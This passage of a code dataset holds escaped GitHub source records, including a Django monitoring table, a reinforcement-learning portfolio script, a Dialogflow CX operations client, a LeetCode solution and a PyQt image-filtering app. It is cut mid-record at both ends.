
\"APA\": \"1, 2, 3, 4, 5, 6\"\n# }\n# ]\n\n\n \n class Meta:\n model = monrun\n attrs = {'class': 'paleblue'}\n exclude = ('description','j_uuid','subrun','jobtype','dl',)\n#############################################################\n#############################################################\n#############################################################\n#---\nclass EvdispTable(MonitorTable):\n changroup = tables.Column(verbose_name='Grp')\n# ts = tables.Column(attrs={'td': {'bgcolor': 'red'}})\n\n def render_changroup(self, value, record):\n\n u = makeImageLink(self.site,\n settings.SITE['dqm_evdisp_url'],\n record.j_uuid, record.run, record.evnum, record.datatype, record.changroup)\n \n image_url = ('%s '\n % (self.site,\n u,\n record.run,\n record.evnum,\n record.changroup,\n record.datatype,\n value\n ))\n\n return mark_safe(image_url)\n\n def render_evnum(self, value, record):\n event_url = ('%s '\n % (self.site,\n record.run,\n record.evnum,\n str(value)\n ))\n# event_url=''+str(record.evnum)+' '\n return mark_safe(event_url)\n \n class Meta:\n model = evdisp\n attrs = {'class': 'paleblue'}\n exclude = ('path',)\n template_name = 'django_tables2/bootstrap4.html'\n######################################################### \n\n\n# Keep for later if you want to display the subrun column in the monrun table\n# Right now it's just unused anyway\n # def render_subrun(self, value, record):\n\n # subrun_url = '%s (old) %s (new) ' % (\n # self.site, str(record.run), str(record.subrun), value,\n # self.site, str(record.run), str(record.subrun), value\n # )\n\n # return mark_safe(subrun_url)\n\n","repo_name":"DUNE/p3s","sub_path":"display/monitor/monitorTables.py","file_name":"monitorTables.py","file_ext":"py","file_size_in_byte":12826,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"70"}
+{"seq_id":"26593791182","text":"\n\nfrom Agents import ACAgent\nfrom Envs import PortfolioEnv\nimport tensorflow as tf\nimport keras.backend as K\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\ndef main():\n sess = tf.Session()\n K.set_session(sess)\n sand = pd.read_csv(\"C:/Users/Phili/Desktop/fond/data/SAND.csv\", sep=\";\", header = 0, index_col = 0, parse_dates = True).iloc[::-1]\n eric = pd.read_csv(\"C:/Users/Phili/Desktop/fond/data/ERIC.csv\", sep=\";\", header = 0, index_col = 0, parse_dates = True).iloc[::-1]\n sand = sand[\"Closing price\"]#.loc[\"2016-01-01\":\"2018-09-01\"]\n eric = eric[\"Closing price\"]#[\"2016-01-01\":\"2018-09-01\"]\n volv = pd.read_csv(\"C:/Users/Phili/Desktop/fond/data/VOLV.csv\", sep=\";\", header = 0, index_col = 0, parse_dates = True).iloc[::-1]\n volv = volv[\"Closing price\"]#[\"2016-01-01\":\"2018-09-01\"]\n\n\n data = pd.DataFrame({\"sand\":sand, \"eric\":eric, \"volv\":volv}, index=sand.index)\n\n env = PortfolioEnv(data, steps=20, trading_cost=0.025, time_cost = 0.0, augment=0.1)\n state_size = env.observation_space.spaces[\"history\"].shape\n action_size = env.action_space.shape\n action_size = (action_size[0],1,1)\n agent = ACAgent(state_size, action_size,env, sess)\n\n episode = 200\n for e in range(episode):\n weights = {s: [] for s in range(action_size[0])}\n \n cur_state = env.reset()\n action = env.action_space.sample()\n while True:\n cur_state = cur_state.reshape(1,3,50,1)\n action = agent.act(cur_state)\n action = action.reshape(1,3,1,1)\n new_state, reward, info, done = env.step(action)\n new_state = new_state.reshape(1,3,50,1)\n agent.remember(cur_state, action, reward, new_state, done)\n agent.train()\n agent.update_target()\n for s in range(action_size[0]):\n weights[s].append(action.reshape(3,)[s])\n\n cur_state = new_state\n if done:\n print(\"Episode: {}/{}, episode end value: {}, weights: {}\".format(e+1, episode, info[\"portfolio_value\"], action.reshape(3,)))\n break\n if e % 5 == 0:\n plt.subplot(1, episode/5, e/5+1)\n for s in range(action_size[0]):\n plt.plot(weights[s], label=str(s))\n plt.legend()\n\n\n \n plt.show()\n\nmain()\n","repo_name":"phlindg/MinRob","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2314,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"40555655066","text":"import logging\nfrom typing import Dict\n\nfrom google.api_core import operations_v1, grpc_helpers\n\nfrom dfcx_scrapi.core import scrapi_base\n\n# logging config\nlogging.basicConfig(\n level=logging.INFO,\n format=\"%(asctime)s %(levelname)-8s %(message)s\",\n datefmt=\"%Y-%m-%d %H:%M:%S\",\n)\n\nclass Operations(scrapi_base.ScrapiBase):\n \"\"\"Core class for Operations functions, primarily used to\n extract LRO information on long running jobs for CX.\n \"\"\"\n\n def __init__(\n self,\n creds_path: str = None,\n creds_dict: Dict = None,\n creds=None,\n scope=False\n ):\n super().__init__(\n creds_path=creds_path,\n creds_dict=creds_dict,\n creds=creds,\n scope=scope\n )\n\n @scrapi_base.api_call_counter_decorator\n def get_lro(self, lro: str):\n \"\"\"Used to retrieve the status of LROs for Dialogflow CX.\n\n Args:\n lro: The Long Running Operation(LRO) ID in the following format\n 'projects//locations//operations/\n '\n\n Returns:\n Response status and payload from LRO\n \"\"\"\n location = lro.split(\"/\")[3]\n if location != \"global\":\n host = f\"{location}-dialogflow.googleapis.com\"\n else:\n host = \"dialogflow.googleapis.com\"\n\n channel = grpc_helpers.create_channel(\n host,\n credentials=self.creds\n )\n client = operations_v1.OperationsClient(channel)\n response = client.get_operation(lro)\n\n return response\n","repo_name":"GoogleCloudPlatform/dfcx-scrapi","sub_path":"src/dfcx_scrapi/core/operations.py","file_name":"operations.py","file_ext":"py","file_size_in_byte":1601,"program_lang":"python","lang":"en","doc_type":"code","stars":51,"dataset":"github-code","pt":"70"}
+{"seq_id":"71911241508","text":"#[COMPLETED]\r\n\r\ndigit_map = {\r\n \"0\": \"0\", \"1\":\"1\", \"8\":\"8\",\r\n \"2\":\"5\", \"5\":\"2\", \"6\":\"9\", \"9\":\"6\",\r\n}\r\n\r\ndef rotate(num: int):\r\n rot = \"\"\r\n for c in str(num):\r\n if c not in digit_map:\r\n return -1\r\n rot += digit_map[c]\r\n return int(rot)\r\n\r\ndef is_good(num: int):\r\n rotated = rotate(num)\r\n if rotated == -1:\r\n return False\r\n return rotated != num\r\n\r\nclass Solution:\r\n def __init__(self):\r\n self.memo = [-1] * 10001\r\n total = 0\r\n for n in range(0, 10001):\r\n if is_good(n):\r\n total += 1\r\n self.memo[n] = total\r\n\r\n def rotatedDigits(self, N: int) -> int:\r\n if not 1 <= N <= 10000:\r\n return -1\r\n return self.memo[N]\r\n\r\n\r\nfor i in range(100):\r\n print(str(i), \"\\t\", str(rotate(i)))\r\n","repo_name":"calvincramer/coding-challenges","sub_path":"leet-code/src/problems/p0788/python/p788.py","file_name":"p788.py","file_ext":"py","file_size_in_byte":822,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"70"}
+{"seq_id":"41196343200","text":"from django.urls import path\nfrom .views import GetPaymentTotalView,CreatePaymentIntentView,StripeWebhookView\n\napp_name=\"payment\"\n\nurlpatterns = [\n path('get-payment-total', GetPaymentTotalView.as_view()),\n path('create-payment-intent', CreatePaymentIntentView.as_view()),\n path('stripe-webhook', StripeWebhookView, name='stripe-webhook'),\n]","repo_name":"annderson8/break-app-backend","sub_path":"apps/payment/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":350,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"5776782181","text":"# select_message.py\n\n\nclass SelectMessage:\n def __init__(self, text, color=None,\n font_size=None,\n time_sec=None,\n msg=None):\n \"\"\" Setup select message\n \"\"\"\n self.text = text\n self.msg = msg\n if color is None:\n color = \"dark gray\"\n self.color = color\n self.font_size = font_size\n self.time_sec = time_sec\n self.end_time = None # time to end if another\n \n def __str__(self):\n \"\"\" Informative string\n \"\"\"\n st = self.text + \" \" + self.color\n if self.time_sec is not None:\n st += \" %.2f sec\" % self.time_sec\n return st\n\n def destroy(self):\n if self.msg is not None:\n self.msg.destroy()\n self.msg = None\n ","repo_name":"raysmith619/imageSelect","sub_path":"src/select_message.py","file_name":"select_message.py","file_ext":"py","file_size_in_byte":842,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"70"}
+{"seq_id":"28019660652","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat Oct 1 22:59:20 2022\r\n\r\n@author: MarthaHT\r\n\"\"\"\r\n\r\nfrom PyQt5.QtWidgets import QGridLayout, QLabel, QPushButton\r\nfrom PyQt5.QtGui import QPixmap, QCursor\r\nfrom PyQt5 import QtCore\r\nfrom urllib.request import urlopen\r\nimport json\r\nimport pandas as pd\r\nimport random\r\n\r\nfrom PyQt5 import QtWidgets, uic, QtGui, QtCore\r\nfrom PyQt5.QtCore import *\r\nfrom PyQt5.QtWidgets import QFileDialog\r\nfrom PyQt5.QtGui import QImage\r\nimport cv2\r\nimport time\r\nfrom PIL import ImageQt\r\nfrom PIL import Image, ImageDraw\r\nimport numpy as np\r\nfrom PIL import Image\r\nimport matplotlib.pyplot as plt\r\n\r\nfrom ec import ec\r\nfrom un import un\r\n\r\n#open api link to database\r\nwith urlopen(\"https://opentdb.com/api.php?amount=50&category=18&difficulty=medium&type=multiple\") as webpage:\r\n #read JSON file & extract data\r\n data = json.loads(webpage.read().decode())\r\n df = pd.DataFrame(data[\"results\"])\r\n\r\n#load 1 instance of questions & answers at a time from the database\r\ndef preload_data(idx):\r\n #idx parm: selected randomly time and again at function call\r\n question = df[\"question\"][idx]\r\n correct = df[\"correct_answer\"][idx]\r\n wrong = df[\"incorrect_answers\"][idx]\r\n\r\n #fixing charecters with bad formatting\r\n formatting = [\r\n (\"#039;\", \"'\"),\r\n (\"&'\", \"'\"),\r\n (\""\", '\"'),\r\n (\"<\", \"<\"),\r\n (\">\", \">\")\r\n ]\r\n\r\n #replace bad charecters in strings\r\n for tuple in formatting:\r\n question = question.replace(tuple[0], tuple[1])\r\n correct = correct.replace(tuple[0], tuple[1])\r\n #replace bad charecters in lists\r\n for tuple in formatting:\r\n wrong = [char.replace(tuple[0], tuple[1]) for char in wrong]\r\n\r\n #store local values globally\r\n parameters[\"question\"].append(question)\r\n parameters[\"correct\"].append(correct)\r\n\r\n all_answers = wrong + [correct]\r\n random.shuffle(all_answers)\r\n\r\n parameters[\"answer1\"].append(all_answers[0])\r\n parameters[\"answer2\"].append(all_answers[1])\r\n parameters[\"answer3\"].append(all_answers[2])\r\n parameters[\"answer4\"].append(all_answers[3])\r\n\r\n\r\n\r\n#dictionary to store local pre-load parameters on a global level\r\nparameters = {\r\n \"question\": [],\r\n \"answer1\": [],\r\n \"answer2\": [],\r\n \"answer3\": [],\r\n \"answer4\": [],\r\n \"correct\": [],\r\n \"score\": [],\r\n \"index\": []\r\n }\r\n\r\n#global dictionary of dynamically changing widgets\r\nwidgets = {\r\n \"logo\": [],\r\n \"orig\": [],\r\n \"button\": [],\r\n \"score\": [],\r\n \"question\": [],\r\n \"question2\": [],\r\n \"button1\": [],\r\n \"opcion1\": [],\r\n \"opcion2\": [],\r\n \"opcion3\": [],\r\n \"opcion4\": [],\r\n \"opcion5\": [],\r\n \"opcion6\": [],\r\n \"answer1\": [],\r\n \"answer2\": [],\r\n \"answer3\": [],\r\n \"answer4\": [],\r\n \"message\": [],\r\n \"message2\": []\r\n}\r\n\r\n#initialliza grid layout\r\ngrid = QGridLayout()\r\n\r\ndef clear_widgets():\r\n ''' hide all existing widgets and erase\r\n them from the global dictionary'''\r\n for widget in widgets:\r\n if widgets[widget] != []:\r\n widgets[widget][-1].hide()\r\n for i in range(0, len(widgets[widget])):\r\n widgets[widget].pop()\r\n\r\ndef clear_parameters():\r\n #clear the global dictionary of parameters\r\n for parm in parameters:\r\n if parameters[parm] != []:\r\n for i in range(0, len(parameters[parm])):\r\n parameters[parm].pop()\r\n #populate with initial index & score values\r\n 
parameters[\"index\"].append(random.randint(0,49))\r\n parameters[\"score\"].append(0)\r\n\r\ndef start_game():\r\n #start the game, reset all widgets and parameters\r\n clear_widgets()\r\n clear_parameters()\r\n preload_data(parameters[\"index\"][-1])\r\n #display the game frame\r\n frame21()\r\n \r\ndef siguiente():\r\n #start the game, reset all widgets and parameters\r\n clear_widgets()\r\n clear_parameters()\r\n preload_data(parameters[\"index\"][-1])\r\n #display the game frame\r\n frame31()\r\n\r\ndef opcion1():\r\n #start the game, reset all widgets and parameters\r\n clear_widgets()\r\n clear_parameters()\r\n preload_data(parameters[\"index\"][-1])\r\n #display the game frame\r\n frameop1()\r\n\r\ndef opcion2():\r\n #start the game, reset all widgets and parameters\r\n clear_widgets()\r\n clear_parameters()\r\n preload_data(parameters[\"index\"][-1])\r\n #display the game frame\r\n frameop2()\r\n\r\ndef opcion3():\r\n #start the game, reset all widgets and parameters\r\n clear_widgets()\r\n clear_parameters()\r\n preload_data(parameters[\"index\"][-1])\r\n #display the game frame\r\n frameop3()\r\n\r\ndef opcion4():\r\n #start the game, reset all widgets and parameters\r\n clear_widgets()\r\n clear_parameters()\r\n preload_data(parameters[\"index\"][-1])\r\n #display the game frame\r\n frameop4()\r\n\r\ndef opcion5():\r\n #start the game, reset all widgets and parameters\r\n clear_widgets()\r\n clear_parameters()\r\n preload_data(parameters[\"index\"][-1])\r\n #display the game frame\r\n frameop5()\r\n\r\ndef create_buttons(answer, l_margin, r_margin):\r\n #create identical buttons with custom left & right margins\r\n button = QPushButton(answer)\r\n button.setCursor(QCursor(QtCore.Qt.PointingHandCursor))\r\n button.setFixedWidth(485)\r\n button.setStyleSheet(\r\n #setting variable margins\r\n \"*{margin-left: \" + str(l_margin) +\"px;\"+\r\n \"margin-right: \" + str(r_margin) +\"px;\"+\r\n '''\r\n border: 4px solid '#BC006C';\r\n color: white;\r\n font-family: 'shanti';\r\n font-size: 16px;\r\n border-radius: 25px;\r\n padding: 15px 0;\r\n margin-top: 20px;\r\n }\r\n *:hover{\r\n background: '#BC006C';\r\n }\r\n '''\r\n )\r\n button.clicked.connect()\r\n return button\r\n\r\ndef is_correct(btn):\r\n #a function to evaluate wether user answer is correct\r\n if btn.text() == parameters[\"correct\"][-1]:\r\n # CORRECT ANSWER\r\n\r\n #update score (+10 points)\r\n temp_score = parameters[\"score\"][-1]\r\n parameters[\"score\"].pop()\r\n parameters[\"score\"].append(temp_score + 10)\r\n\r\n #select a new random index and replace the old one\r\n parameters[\"index\"].pop()\r\n parameters[\"index\"].append(random.randint(0,49))\r\n #preload data for new index value\r\n preload_data(parameters[\"index\"][-1])\r\n\r\n #update the text of all widgets with new data\r\n widgets[\"score\"][-1].setText(str(parameters[\"score\"][-1]))\r\n widgets[\"question\"][0].setText(parameters[\"question\"][-1])\r\n widgets[\"answer1\"][0].setText(parameters[\"answer1\"][-1])\r\n widgets[\"answer2\"][0].setText(parameters[\"answer2\"][-1])\r\n widgets[\"answer3\"][0].setText(parameters[\"answer3\"][-1])\r\n widgets[\"answer4\"][0].setText(parameters[\"answer4\"][-1])\r\n\r\n if parameters[\"score\"][-1] == 100:\r\n # WON THE GAME\r\n clear_widgets()\r\n frame3()\r\n else:\r\n # WRONG ANSWER - LOST GAME\r\n clear_widgets()\r\n frame4()\r\n\r\n#*********************************************\r\n# FRAME 1\r\n#*********************************************\r\n\r\ndef frame1():\r\n clear_widgets()\r\n #logo 
widget\r\n image = QPixmap(\"logo.png\")\r\n logo = QLabel()\r\n logo.setPixmap(image)\r\n logo.setAlignment(QtCore.Qt.AlignCenter)\r\n logo.setStyleSheet(\"margin-top: 100px;\")\r\n widgets[\"logo\"].append(logo)\r\n\r\n #button widget\r\n button = QPushButton(\"Comienza a crear\")\r\n button.resize(400,400)\r\n button.setCursor(QCursor(QtCore.Qt.PointingHandCursor))\r\n button.setStyleSheet(\r\n '''\r\n *{\r\n border: 4px solid '#BC006C';\r\n border-radius: 45px;\r\n font-size: 35px;\r\n color: 'white';\r\n padding: 25px 0;\r\n margin: 100px 200px;\r\n }\r\n *:hover{\r\n background: '#BC006C';\r\n }\r\n '''\r\n )\r\n #button callback\r\n button.clicked.connect(start_game)\r\n widgets[\"button\"].append(button)\r\n\r\n #place global widgets on the grid\r\n grid.addWidget(widgets[\"logo\"][-1], 0, 0, 1, 2)\r\n grid.addWidget(widgets[\"button\"][-1], 1, 0, 1, 2)\r\n\r\n#*********************************************\r\n# FRAME 2_1\r\n#*********************************************\r\ndef cargarImagen():\r\n global filename\r\n filename = QFileDialog.getOpenFileName(filter=\"Image (*.*)\")[0]\r\n return filename\r\n\r\n\r\ndef frame21():\r\n \r\n \r\n clear_widgets()\r\n #question widget\r\n question = QLabel(\"Selecciona la imagen que te gustaría procesar\")\r\n question.setAlignment(QtCore.Qt.AlignCenter)\r\n question.setWordWrap(True)\r\n question.setStyleSheet(\r\n '''\r\n font-family: 'shanti';\r\n font-size: 25px;\r\n color: 'white';\r\n padding: 10px;\r\n '''\r\n )\r\n widgets[\"question\"].append(question)\r\n \r\n #button widget\r\n button = QPushButton(\"Siguiente\")\r\n button.setCursor(QCursor(QtCore.Qt.PointingHandCursor))\r\n button.setGeometry(500, 150, 100, 40)\r\n button.adjustSize()\r\n button.setStyleSheet(\r\n '''\r\n *{\r\n border: 4px solid '#BC006C';\r\n border-radius: 45px;\r\n font-size: 35px;\r\n color: 'white';\r\n padding: 25px 70px;\r\n margin: 10px 50px;\r\n }\r\n *:hover{\r\n background: '#BC006C';\r\n }\r\n '''\r\n )\r\n #button callback\r\n widgets[\"button\"].append(button)\r\n\r\n #button widget\r\n button1 = QPushButton(\"Siguiente\")\r\n button1.setCursor(QCursor(QtCore.Qt.PointingHandCursor))\r\n \r\n button1.setStyleSheet(\r\n '''\r\n *{\r\n border: 4px solid '#BC006C';\r\n border-radius: 45px;\r\n font-size: 35px;\r\n color: 'white';\r\n padding: 25px 70px;\r\n margin: 10px 50px;\r\n }\r\n *:hover{\r\n background: '#BC006C';\r\n }\r\n '''\r\n )\r\n \r\n #button callback \r\n button.clicked.connect(siguiente) \r\n filename=str(cargarImagen())\r\n widgets[\"button\"].append(button)\r\n #logo widget\r\n image = QPixmap(filename)\r\n image2 = image.scaledToWidth(500)\r\n logo = QLabel()\r\n logo.setPixmap(image2)\r\n logo.setAlignment(QtCore.Qt.AlignCenter)\r\n logo.setStyleSheet(\"margin-top: 1px; margin-bottom: 1px;\")\r\n widgets[\"logo\"].append(logo)\r\n\r\n #place global widgets on the grid\r\n grid.addWidget(widgets[\"question\"][-1], 0, 0, 1, 2)\r\n grid.addWidget(widgets[\"logo\"][-1], 1, 0, 1, 2)\r\n grid.addWidget(widgets[\"button\"][-1], 2, 0,1,2)\r\n \r\n\r\n#*********************************************\r\n# FRAME 31\r\n#*********************************************\r\n\r\ndef frame31():\r\n\r\n #question widget\r\n question = QLabel(\"Selecciona el tipo de procesamiento que quieres realizar:\")\r\n question.setAlignment(QtCore.Qt.AlignCenter)\r\n question.setWordWrap(True)\r\n question.setStyleSheet(\r\n '''\r\n font-family: 'shanti';\r\n font-size: 25px;\r\n color: 'white';\r\n padding: 1px;\r\n '''\r\n )\r\n 
widgets[\"question\"].append(question)\r\n \r\n #button widget\r\n Bopcion1 = QPushButton(\"Ecualización\")\r\n Bopcion1.setCursor(QCursor(QtCore.Qt.PointingHandCursor))\r\n Bopcion1.setGeometry(500, 150, 100, 40)\r\n Bopcion1.adjustSize()\r\n Bopcion1.setStyleSheet(\r\n '''\r\n *{\r\n border: 4px solid '#BC006C';\r\n border-radius: 45px;\r\n font-size: 35px;\r\n color: 'white';\r\n padding: 25px 70px;\r\n margin: 10px 10px;\r\n }\r\n *:hover{\r\n background: '#BC006C';\r\n }\r\n '''\r\n )\r\n #button callback\r\n widgets[\"opcion1\"].append(Bopcion1)\r\n \r\n #button widget\r\n Bopcion2 = QPushButton(\"Unsharped\")\r\n Bopcion2.setCursor(QCursor(QtCore.Qt.PointingHandCursor))\r\n Bopcion2.setGeometry(500, 150, 100, 40)\r\n Bopcion2.adjustSize()\r\n Bopcion2.setStyleSheet(\r\n '''\r\n *{\r\n border: 4px solid '#BC006C';\r\n border-radius: 45px;\r\n font-size: 35px;\r\n color: 'white';\r\n padding: 25px 25px;\r\n margin: 10px 10px;\r\n }\r\n *:hover{\r\n background: '#BC006C';\r\n }\r\n '''\r\n )\r\n #button callback\r\n widgets[\"opcion2\"].append(Bopcion2)\r\n \r\n #button widget\r\n Bopcion3 = QPushButton(\"Filtro Difuso\")\r\n Bopcion3.setCursor(QCursor(QtCore.Qt.PointingHandCursor))\r\n Bopcion3.setGeometry(500, 150, 100, 40)\r\n Bopcion3.adjustSize()\r\n Bopcion3.setStyleSheet(\r\n '''\r\n *{\r\n border: 4px solid '#BC006C';\r\n border-radius: 45px;\r\n font-size: 35px;\r\n color: 'white';\r\n padding: 25px 25px;\r\n margin: 10px 10px;\r\n }\r\n *:hover{\r\n background: '#BC006C';\r\n }\r\n '''\r\n )\r\n #button callback\r\n widgets[\"opcion3\"].append(Bopcion3)\r\n \r\n #button widget\r\n Bopcion4 = QPushButton(\"EMBH\")\r\n Bopcion4.setCursor(QCursor(QtCore.Qt.PointingHandCursor))\r\n Bopcion4.setGeometry(500, 150, 100, 40)\r\n Bopcion4.adjustSize()\r\n Bopcion4.setStyleSheet(\r\n '''\r\n *{\r\n border: 4px solid '#BC006C';\r\n border-radius: 45px;\r\n font-size: 35px;\r\n color: 'white';\r\n padding: 25px 25px;\r\n margin: 10px 10px;\r\n }\r\n *:hover{\r\n background: '#BC006C';\r\n }\r\n '''\r\n )\r\n #button callback\r\n widgets[\"opcion4\"].append(Bopcion4)\r\n \r\n #button widget\r\n Bopcion5 = QPushButton(\"Combinar con arte\")\r\n Bopcion5.setCursor(QCursor(QtCore.Qt.PointingHandCursor))\r\n Bopcion5.setGeometry(500, 150, 100, 40)\r\n Bopcion5.adjustSize()\r\n Bopcion5.setStyleSheet(\r\n '''\r\n *{\r\n border: 4px solid '#BC006C';\r\n border-radius: 45px;\r\n font-size: 35px;\r\n color: 'white';\r\n padding: 25px 25px;\r\n margin: 10px 50px;\r\n }\r\n *:hover{\r\n background: '#BC006C';\r\n }\r\n '''\r\n )\r\n #button callback\r\n widgets[\"opcion5\"].append(Bopcion5)\r\n \r\n #button widget\r\n Bopcion6 = QPushButton(\"Escucha a Jupiter\")\r\n Bopcion6.setCursor(QCursor(QtCore.Qt.PointingHandCursor))\r\n Bopcion6.setGeometry(500, 150, 100, 40)\r\n Bopcion6.adjustSize()\r\n Bopcion6.setStyleSheet(\r\n '''\r\n *{\r\n border: 4px solid '#BC006C';\r\n border-radius: 45px;\r\n font-size: 35px;\r\n color: 'white';\r\n padding: 25px 25px;\r\n margin: 10px 50px;\r\n }\r\n *:hover{\r\n background: '#BC006C';\r\n }\r\n '''\r\n )\r\n #button callback\r\n widgets[\"opcion6\"].append(Bopcion6)\r\n \r\n #place global widgets on the grid\r\n grid.addWidget(widgets[\"question\"][-1], 0, 0, 1, 2)\r\n grid.addWidget(widgets[\"opcion1\"][-1], 1, 0) \r\n grid.addWidget(widgets[\"opcion2\"][-1], 1, 1) \r\n grid.addWidget(widgets[\"opcion3\"][-1], 2, 0) \r\n grid.addWidget(widgets[\"opcion4\"][-1], 2, 1)\r\n grid.addWidget(widgets[\"opcion5\"][-1], 3, 0) \r\n 
grid.addWidget(widgets[\"opcion6\"][-1], 3, 1)\r\n \r\n Bopcion1.clicked.connect(opcion1) \r\n Bopcion2.clicked.connect(opcion2) \r\n Bopcion3.clicked.connect(opcion3) \r\n Bopcion4.clicked.connect(opcion4) \r\n Bopcion5.clicked.connect(opcion5) \r\n\r\n#*********************************************\r\n# OPCION 1\r\n#*********************************************\r\n\r\ndef frameop1():\r\n\r\n #question widget\r\n question = QLabel(\"Ecualización de histograma\")\r\n question.setAlignment(QtCore.Qt.AlignCenter)\r\n question.setWordWrap(True)\r\n question.setStyleSheet(\r\n '''\r\n font-family: 'shanti';\r\n font-size: 25px;\r\n color: 'white';\r\n padding: 1px;\r\n '''\r\n )\r\n widgets[\"question\"].append(question)\r\n salida = ec(filename)\r\n '''\r\n salida = ec(filename)\r\n qimage = ImageQt.ImageQt(salida).copy()\r\n pixmap = QtGui.QPixmap.fromImage(qimage)\r\n label = QtWidgets.QLabel()\r\n label.setPixmap(pixmap)\r\n '''\r\n '''\r\n Ah = salida.shape[0]\r\n w = salida.shape[1]\r\n ch = 3\r\n bytesPerLine = ch * w\r\n qImg = QImage(rgb_array.data, w, h, bytesPerLine, QImage.Format_RGB888)\r\n ''' \r\n \r\n question2 = QLabel(\"Es un procesamiento que con base en el histograma de una imagen, \\n realiza una transformación de los datos para \\n obtener una representación de valores uniformes\")\r\n question2.setAlignment(QtCore.Qt.AlignCenter)\r\n question.setWordWrap(True)\r\n question2.setStyleSheet(\r\n '''\r\n font-family: 'shanti';\r\n font-size: 15px;\r\n color: 'white';\r\n padding: 1px;\r\n '''\r\n )\r\n widgets[\"question2\"].append(question2)\r\n salida = ec(filename)\r\n \r\n #logo widget\r\n image = QPixmap(filename)\r\n image2 = image.scaledToWidth(500)\r\n logo2 = QLabel()\r\n logo2.setPixmap(image2)\r\n logo2.setAlignment(QtCore.Qt.AlignCenter)\r\n logo2.setStyleSheet(\"margin-top: 10px;\")\r\n widgets[\"orig\"].append(logo2)\r\n \r\n #logo widget\r\n image = QPixmap(\"ec.jpg\")\r\n image2 = image.scaledToWidth(500)\r\n logo = QLabel()\r\n logo.setPixmap(image2)\r\n logo.setAlignment(QtCore.Qt.AlignCenter)\r\n logo.setStyleSheet(\"margin-top: 10px;\")\r\n widgets[\"logo\"].append(logo)\r\n\r\n #place global widgets on the grid\r\n grid.addWidget(widgets[\"question\"][-1], 0, 0)\r\n grid.addWidget(widgets[\"question2\"][-1], 0, 1)\r\n grid.addWidget(widgets[\"orig\"][-1], 1, 0)\r\n grid.addWidget(widgets[\"logo\"][-1], 1, 1)\r\n\r\n#*********************************************\r\n# OPCION 2\r\n#*********************************************\r\n\r\ndef frameop2():\r\n\r\n #question widget\r\n question = QLabel(\"Unsharped\")\r\n question.setAlignment(QtCore.Qt.AlignCenter)\r\n question.setWordWrap(True)\r\n question.setStyleSheet(\r\n '''\r\n font-family: 'shanti';\r\n font-size: 25px;\r\n color: 'white';\r\n padding: 1px;\r\n '''\r\n )\r\n \r\n question2 = QLabel(\"Es un filtro que sirve para la mejora \\n de nitidez en imagenes\")\r\n question2.setAlignment(QtCore.Qt.AlignCenter)\r\n question.setWordWrap(True)\r\n question2.setStyleSheet(\r\n '''\r\n font-family: 'shanti';\r\n font-size: 15px;\r\n color: 'white';\r\n padding: 1px;\r\n '''\r\n )\r\n widgets[\"question2\"].append(question2)\r\n salida = ec(filename)\r\n \r\n widgets[\"question\"].append(question)\r\n salida = un(filename)\r\n '''\r\n salida = ec(filename)\r\n qimage = ImageQt.ImageQt(salida).copy()\r\n pixmap = QtGui.QPixmap.fromImage(qimage)\r\n label = QtWidgets.QLabel()\r\n label.setPixmap(pixmap)\r\n '''\r\n '''\r\n Ah = salida.shape[0]\r\n w = salida.shape[1]\r\n ch = 3\r\n bytesPerLine = ch * w\r\n 
qImg = QImage(rgb_array.data, w, h, bytesPerLine, QImage.Format_RGB888)\r\n ''' \r\n #logo widget\r\n image = QPixmap(filename)\r\n image2 = image.scaledToWidth(500)\r\n logo2 = QLabel()\r\n logo2.setPixmap(image2)\r\n logo2.setAlignment(QtCore.Qt.AlignCenter)\r\n logo2.setStyleSheet(\"margin-top: 10px;\")\r\n widgets[\"orig\"].append(logo2)\r\n \r\n #logo widget\r\n image = QPixmap(\"un.jpg\")\r\n image2 = image.scaledToWidth(500)\r\n logo = QLabel()\r\n logo.setPixmap(image2)\r\n logo.setAlignment(QtCore.Qt.AlignCenter)\r\n logo.setStyleSheet(\"margin-top: 10px;\")\r\n widgets[\"logo\"].append(logo)\r\n\r\n #place global widgets on the grid\r\n grid.addWidget(widgets[\"question\"][-1], 0, 0)\r\n grid.addWidget(widgets[\"question2\"][-1], 0, 1)\r\n grid.addWidget(widgets[\"orig\"][-1], 1, 0)\r\n grid.addWidget(widgets[\"logo\"][-1], 1, 1)\r\n\r\n#*********************************************\r\n# OPCION 3\r\n#*********************************************\r\n\r\ndef frameop3():\r\n\r\n #question widget\r\n question = QLabel(\"Opcion3\")\r\n question.setAlignment(QtCore.Qt.AlignCenter)\r\n question.setWordWrap(True)\r\n question.setStyleSheet(\r\n '''\r\n font-family: 'shanti';\r\n font-size: 25px;\r\n color: 'white';\r\n padding: 10px;\r\n '''\r\n )\r\n widgets[\"question\"].append(question)\r\n\r\n #place global widgets on the grid\r\n grid.addWidget(widgets[\"question\"][-1], 0, 0, 1, 2)\r\n \r\n#*********************************************\r\n# OPCION 4\r\n#*********************************************\r\n\r\ndef frameop4():\r\n\r\n #question widget\r\n question = QLabel(\"Opcion4\")\r\n question.setAlignment(QtCore.Qt.AlignCenter)\r\n question.setWordWrap(True)\r\n question.setStyleSheet(\r\n '''\r\n font-family: 'shanti';\r\n font-size: 25px;\r\n color: 'white';\r\n padding: 10px;\r\n '''\r\n )\r\n widgets[\"question\"].append(question)\r\n\r\n #place global widgets on the grid\r\n grid.addWidget(widgets[\"question\"][-1], 0, 0, 1, 2)\r\n\r\n#*********************************************\r\n# OPCION 5\r\n#*********************************************\r\n\r\ndef frameop5():\r\n\r\n #question widget\r\n question = QLabel(\"Opcion5\")\r\n question.setAlignment(QtCore.Qt.AlignCenter)\r\n question.setWordWrap(True)\r\n question.setStyleSheet(\r\n '''\r\n font-family: 'shanti';\r\n font-size: 25px;\r\n color: 'white';\r\n padding: 10px;\r\n '''\r\n )\r\n widgets[\"question\"].append(question)\r\n\r\n #place global widgets on the grid\r\n grid.addWidget(widgets[\"question\"][-1], 0, 0, 1, 2)\r\n \r\n \r\n#*********************************************\r\n# FRAME 